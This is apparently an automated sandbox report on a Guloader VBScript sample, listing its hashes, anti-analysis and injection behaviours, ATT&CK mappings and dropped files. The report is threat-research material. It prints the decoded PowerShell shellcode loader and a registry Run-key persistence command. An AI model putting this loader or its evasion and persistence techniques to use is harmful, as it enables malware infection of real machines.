Analysis
-
max time kernel
150s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25-12-2024 03:35
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs
-
Size
727KB
-
MD5
99a444a2e45d6007e37fb0c2c25e49c4
-
SHA1
7ab6b11b684243ae587b6eb037cabe98984792ff
-
SHA256
724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3
-
SHA512
7398994f927e22cd1bf868436c4645f368cf3439fe00dd836c10d8860ae22c73aa16f4ddd9c6f37053c326d65734d9e6ad1afe73955cc727c7c982b31f6ae69e
-
SSDEEP
6144:7umfsxtdM+jbYG0XxnHVMYhRANfAD58OAFZ3/g5VCyh9IiwEw6IAl:uoQYhiNft+wErIe
Malware Config
Signatures
-
Guloader family
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bulningssaarer = "%Mija% -w 1 $Kvstendediplom=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Medsammensvornest;%Mija% -encodedcommand($Kvstendediplom)" ieinstal.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 4 drive.google.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 2940 ieinstal.exe 2940 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2272 powershell.exe 2940 ieinstal.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2272 set thread context of 2940 2272 powershell.exe 32 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ieinstal.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2272 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2272 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2272 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2940 ieinstal.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2236 wrote to memory of 2272 2236 WScript.exe 28 PID 2236 wrote to memory of 2272 2236 WScript.exe 28 PID 2236 wrote to memory of 2272 2236 WScript.exe 28 PID 2236 wrote to memory of 2272 2236 WScript.exe 28 PID 2272 wrote to memory of 2044 2272 powershell.exe 30 PID 2272 wrote to memory of 2044 2272 powershell.exe 30 PID 2272 wrote to memory of 2044 2272 powershell.exe 30 PID 2272 wrote to memory of 2044 2272 powershell.exe 30 PID 2044 wrote to memory of 2916 2044 csc.exe 31 PID 2044 wrote to memory of 2916 2044 csc.exe 31 PID 2044 wrote to memory of 2916 2044 csc.exe 31 PID 2044 wrote to memory of 2916 2044 csc.exe 31 PID 2272 wrote to memory of 2940 2272 powershell.exe 32 PID 2272 wrote to memory of 2940 2272 powershell.exe 32 PID 2272 wrote to memory of 2940 2272 powershell.exe 32 PID 2272 wrote to memory of 2940 2272 powershell.exe 32 PID 2272 wrote to memory of 2940 2272 powershell.exe 32 PID 2272 wrote to memory of 2940 2272 powershell.exe 32 PID 2272 wrote to memory of 2940 2272 powershell.exe 32 PID 2272 wrote to memory of 2940 2272 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# H y a e n o d o n t d e p u t e r e t h a m p e f r s   S u b s t i t u r m i s g r a d e   T m m e r f l a a d e r s s p a t t i n g u d s   A r i l e d l a d i f i e d t i l g a n g   G r u n d t o n e s m i t s u m a t a p r e c e n   o r g a n i s a t i o n e r n e s s   M e t h o l j u d e a n i n d o r d n i n g m o n o t y p   B e f o l k n i n g s s u n d h e d e n f o r u d b e   C a r a m e l i n p u t t o o m o n o p l o i   D r n i n g e r s a p s i d a l l   T a m p o n a d e n s t r i b   S o k k e f d d e r s u l a s t e l i g h e d s o v e r h o   B a r n a g t i g h e d e r n e c a g i e   L a n d s f o r e n i n g s n o    
 $ R u m f a r t s c e n t r e s v i r k 0   =   " N " + " t " + " A l l " + " o c a t e " + " V i r t " + " u a l " + " M e m " + " o r y "  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1  
 {  
 [ D l l I m p o r t ( " u s e r 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   G e t K e y b o a r d S t a t e ( i n t   v a r 1 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   R t l M o v e M e m o r y ( I n t P t r   S a m l e v e r s k e n s k r 1 , r e f   I n t 3 2   S a m l e v e r s k e n s k r 2 , i n t   S a m l e v e r s k e n s k r 3 ) ;  
  
 [ D l l I m p o r t ( " w i n m m . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   t i m e B e g i n P e r i o d ( i n t   v a r 1 ) ;  
 [ D l l I m p o r t ( " n t d l l . d l l " ,   E n t r y P o i n t = " $ R u m f a r t s c e n t r e s v i r k 0 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   C o r e 1 ( i n t   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 6 , r e f   I n t 3 2   F o r f i l m e n e s r e k n o c k r e p r o d u c , i n t   S a m l e v e r s k e n s k r , r e f   I n t 3 2   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m , i n t   R u m f a r t s c e n t r e s v i r k , i n t   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 7 ) ;  
  
 [ D l l I m p o r t ( " g d i 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   G e t I C M P r o f i l e ( i n t   v a r 1 , i n t   v a r 2 , i n t   v a r 3 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   G e t S t r i n g T y p e E x ( i n t   v a r 1 , i n t   v a r 2 , i n t   v a r 3 , i n t   v a r 4 , i n t   v a r 5 ) ;  
  
 [ D l l I m p o r t ( " u s e r 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   I s R e c t E m p t y ( i n t   v a r 1 ) ;  
  
  
  
 [ D l l I m p o r t ( " u s e r 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m W i n d o w s ( u i n t   S a m l e v e r s k e n s k r 5 , i n t   S a m l e v e r s k e n s k r 6 ) ;  
  
  
 }  
 " @  
 # D e m u r s t e k n o l o g i s k e s n d e   M o t h e r l e s s h o t e l v r e l s e   Y a l l a e r u d e l e l i g t a   K v a r t e r r a p p o r t e r s s v e l n i n g   F i b e r g l a s s e t s f r i s k e r   T r s n i t s u n a s s o c i a t i v e c h o   P o s t p a t e l l a r t e   R a g t o p s k r m h a a n d t e r i n g e r n e t r l   S e m i p r o g r e s s i v e l y u   m a n d e t i m e r n e s l e z g y p s u   U n d e r m e n n e s k e b r a c t l e t t a p s t e r l y   C h a u c h a t r e v e r e n   L s e h a s t i g h e d e n s d v r g b i r k e s a b a n   S t e n r k e n e n a c c e s s i o n s e j a k u l a t i o   M i n n e s o t a b a s i l i   H u d f l e t n i n g e r n e s l i g h t n i n g p   N a t a l i t y r a t i o n a l i   B j r n e l a b m a s c u l i n e s n o   A f v i s e r n e s u n i n t r o d u c t o r y f o r   A r i a d n e t r a a d e s b l a n c h e r i n g e n   B r i b e r s t a n d a r d i s e   P r o p i t i o u s l y i n e x p r e s s c e n t   P o l l i n i f e r o u s t o   K a p e l p o s t s c u t e l l a i r r e s p o n s i b l e   S u p e r u r g e n t l y r e s u n d f e r i e g o   H e n n i n g s b e g l o b   T a r r e r a n g r e b s p u n k t s e k s   B u c h i t e p i l e r g r u t c h p l u m c o t s p y   q u a s s e x t r a t e l l u r i a n e l e c t r o d i a l   S m u g l e r e n s m a t r i p o t   u n s a w n p i e t e r s a n g i r i n h a b i t a t i o n   R i d s e n e h u n d e s v   S t r a f a f s o n e r s u i g e n n e m s k u e l i g      
 $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 = 0 ;  
 $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 9 = 1 0 4 8 5 7 6 ;  
 $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 8 = [ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1 ] : : C o r e 1 ( - 1 , [ r e f ] $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 , 0 , [ r e f ] $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 9 , 1 2 2 8 8 , 6 4 )  
 $ b r k d e l e n e s e f t e r g i v e t n = ( G e t - I t e m P r o p e r t y   - P a t h   " H K C U : \ S o f t w a r e \ T a l t e s a f t e n b n n e n s p r m i e l a a n s c u " ) . U n s a l l y i n g r e b e l l i o n n o n e  
  
 $ U d t y d e t r o t h k o m e l o d   =   [ S y s t e m . B y t e [ ] ] : : C r e a t e I n s t a n c e ( [ S y s t e m . B y t e ] , $ b r k d e l e n e s e f t e r g i v e t n . L e n g t h   /   2 )  
  
  
  
 F o r ( $ i = 0 ;   $ i   - l t   $ b r k d e l e n e s e f t e r g i v e t n . L e n g t h ;   $ i + = 2 )  
 	 {  
                 $ U d t y d e t r o t h k o m e l o d [ $ i / 2 ]   =   [ c o n v e r t ] : : T o B y t e ( $ b r k d e l e n e s e f t e r g i v e t n . S u b s t r i n g ( $ i ,   2 ) ,   1 6 )  
         }  
  
  
 f o r ( $ K e g l e f l a d e r n e e t h n o g r a p h = 0 ;   $ K e g l e f l a d e r n e e t h n o g r a p h   - l t   $ U d t y d e t r o t h k o m e l o d . c o u n t   ;   $ K e g l e f l a d e r n e e t h n o g r a p h + + )  
 {  
 	  
 [ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1 ] : : R t l M o v e M e m o r y ( $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 + $ K e g l e f l a d e r n e e t h n o g r a p h , [ r e f ] $ U d t y d e t r o t h k o m e l o d [ $ K e g l e f l a d e r n e e t h n o g r a p h ] , 1 )  
  
 }  
 [ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1 ] : : E n u m W i n d o w s ( $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 ,   0 )  
  
 "2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-piv1c4-.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8DC0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8DBF.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2916
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2940
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5093f30cf544785834cc09a55743038c6
SHA1af69656ad1b049a2a13cfe8e23874e9cd2325c9b
SHA25653c7931ad555b2dc8da3e44a15a0964c19a996b7443471863ec57f333eb06580
SHA512fe1d819e26c3a8baaa83983c30b477dec2e3c8b47c1cabe5032b3b53b3b1d7532af51fe4785cc2c684f106dfdc5da3b5598f8b8b7c63a1923520511541765e6d
-
Filesize
7KB
MD5dd5e50179ff04c34430f4a8440a6de61
SHA1be6f3cb2ed8fb1585e6abfe92e758fccc7963933
SHA256a2c2dd1e98ab99d9efbbaf398512306eb292a226ae1d4a104c79037c4aa18ec7
SHA5127a1b6d9b6ecb5640921df19707bf006a268c9df8c1db55240b6336dba31184091218f970495b652e99e9b192dfa7b2b0b9c968e2ad0bd0ef2df4f7f3825bcfca
-
Filesize
1KB
MD5531a1b1cdc1c1e148d9810a18acf6e49
SHA1d1c524c63fcb01926defbae55f3b1b46f80f376e
SHA256aa30f7ed3714609752f136c3da9e7d85f30a77ee1beb6aeff8fb5cab11d04c86
SHA51295c29d0c0e10017a26eee689cc18d38b98ba8876abc0ff3a5ef02df78110e31b3f90a2a23a67520f26dd6d8f671e3528db4143da77109ebd1692373ab104be22
-
Filesize
1KB
MD5fd01bdbcce0a28e44e23fd48d27fecb3
SHA1e601c783d5852bec3efdb1c2bac13b5e0c65f2a2
SHA256c0fef30f1c5beaa723a8f20f8f728ae7f5241cffed7ba54e792b32500ae7d20d
SHA5120a2978a4a22b75f871b70f7e86cfc8d92b9b314f86396ceb995f254d16ad85303fa0a6236a2e2308b23fbe16edbfbe8c9ac5b63d2daeb171d1126e97a6b21a69
-
Filesize
309B
MD5d311d3395048f6a99df2aababe71409b
SHA1030c8b0cd433212fbc0a5ba135528da4e7c23930
SHA256698545b2af115632dc859a7418eeaab9047a5f49e0ec4c0fd4a8bc7cf919e6bc
SHA512aecdf5d3e167940d6bd0b1ab17e7aa78581988f56a1ddbd5a5f6178d12b65793e0a6f38a71118ce7a4525a18cb2d845751bd928948b57a4e0eac7d670abd1bfe
-
Filesize
652B
MD5abf2f0e0e03ed84fe3dced9afeca220e
SHA17b27beec5972f903e774d3fb3f55599c8f900167
SHA256c8dadf21dd3190b7ef56efc219a132c4f49fd5b8f14025a76b32271312beebb3
SHA51229ab220f59d1e3f27ce6836be679d20dbcc8a8ebeb22103e9265b5c2cb96497d55ead052f02fea2dab85ae6f2552a8dd13fcf1631b1d0c5015d368177d87fa1e